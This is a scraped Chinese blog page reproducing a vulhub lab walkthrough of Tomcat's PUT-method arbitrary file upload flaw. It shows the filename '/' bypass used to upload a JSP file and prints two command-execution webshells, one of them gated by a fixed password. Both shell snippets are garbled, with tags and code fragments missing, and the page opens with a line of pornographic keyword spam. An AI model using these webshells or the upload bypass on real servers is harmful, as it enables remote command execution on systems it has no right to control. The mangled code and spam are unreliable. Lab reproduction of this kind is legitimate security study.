日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

dockers log查询dockers的文件_Tomcat PUT方法任意文件上传

發布時間:2024/9/27 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 dockers log查询dockers的文件_Tomcat PUT方法任意文件上传 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞背景:

????tomcat(7.0.0-7.8.1)服務器,開啟了HTTP PUT請求方法,web.xml文件中的readonly值設置未false

漏洞環境:

使用vulhub環境,直接dockers安裝

安裝成功:

安裝vulhub詳見:

????https://vulhub.org/#/index/

漏洞利用:

直接抓包進行修改

????1、修改為put方法

????2、寫入shell

測試是否開啟PUT方法

寫入shell(注意需要在文件名后面加上一個/進行過濾繞過,未加/會報錯,如果寫入一個txt文件則不用加/且不會報錯)

測試結果

shell(linux下使用,我之前用了一個Windows的,執行報錯)

"java" import=public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try { Process pro = Runtime.getRuntime().exec(c); BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); String temp = null; while ((temp = buf.readLine()) != null) { line.append(temp + "\\n"); } buf.close(); } catch (Exception e) { line.append(e.getMessage()); } return line.toString();} %> if(else{out.println(":-)");}%>

shell(windows,未使用過,一個大佬的復現使用的)

if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[1024]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(" } %>

后續再試著使用其它的shell及工具(CVE-2017-12615漏洞利用工具)進行測試,提高效率

總結

以上是生活随笔為你收集整理的dockers log查询dockers的文件_Tomcat PUT方法任意文件上传的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。